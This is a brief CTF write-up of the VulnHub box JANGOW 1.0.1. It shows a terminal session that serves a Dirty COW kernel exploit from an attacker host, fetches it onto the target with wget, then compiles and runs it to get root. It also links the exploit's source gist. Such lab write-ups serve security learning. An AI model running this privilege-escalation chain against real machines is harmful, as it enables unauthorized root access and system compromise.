Vulnhub: JANGOW: 1.0.1

This is JANGOW: 1.0.1 from VulnHub.

Difficulty: Easy

The secret to this box is enumeration!

Did I ever mention I hate old kernel exploits? Yeah well this one works: https://gist.github.com/scumjr/17d91f20f73157c722ba2aea702985d2

┌──(root💀kali)-[/opt/scripts]
└─# updog -p 443          
[+] Serving /opt/scripts...
 * Running on all addresses.
   WARNING: This is a development server. Do not use it in a production deployment.
 * Running on http://192.168.1.210:443/ (Press CTRL+C to quit)
192.168.1.135 - - [17/Nov/2021 05:15:19] "GET /dirtypoc.c HTTP/1.1" 200 -

jangow01@jangow01:~$ wget http://192.168.1.210:443/dirtypoc.c
wget http://192.168.1.210:443/dirtypoc.c
--2021-11-17 19:15:18--  http://192.168.1.210:443/dirtypoc.c
Conectando-se a 192.168.1.210:443... conectado.
A requisição HTTP foi enviada, aguardando resposta... 200 OK
Tamanho: 5120 (5,0K) [text/x-csrc]
Salvando em: “dirtypoc.c”

dirtypoc.c          100%[===================>]   5,00K  --.-KB/s    in 0s      

2021-11-17 19:15:18 (110 MB/s) - “dirtypoc.c” salvo [5120/5120]

jangow01@jangow01:~$
jangow01@jangow01:~$ mv dirtypoc.c dirtycow-mem.c
mv dirtypoc.c dirtycow-mem.c
jangow01@jangow01:~$ gcc -Wall -o dirtycow-mem dirtycow-mem.c -ldl -lpthread
# this throws an error; ignore it
jangow01@jangow01:~$ ./dirtycow-mem
./dirtycow-mem
[*] range: 7f078928f000-7f078944f000]
[*] getuid = 7f078935c2c0
[*] mmap 0x7f0789acb000
[*] exploiting (patch)
[*] patched (procselfmemThread)
[*] patched (madviseThread)
root@jangow01:/home/jangow01# [*] exploiting (unpatch)
[*] unpatched: uid=1000 (procselfmemThread)
[*] unpatched: uid=1000 (madviseThread)
id;hostname;date
id;hostname;date
uid=0(root) gid=0(root) grupos=0(root)
jangow01
Qua Nov 17 19:16:22 BRST 2021
root@jangow01:/home/jangow01#

How did we get here? Who cares, it’s not interesting.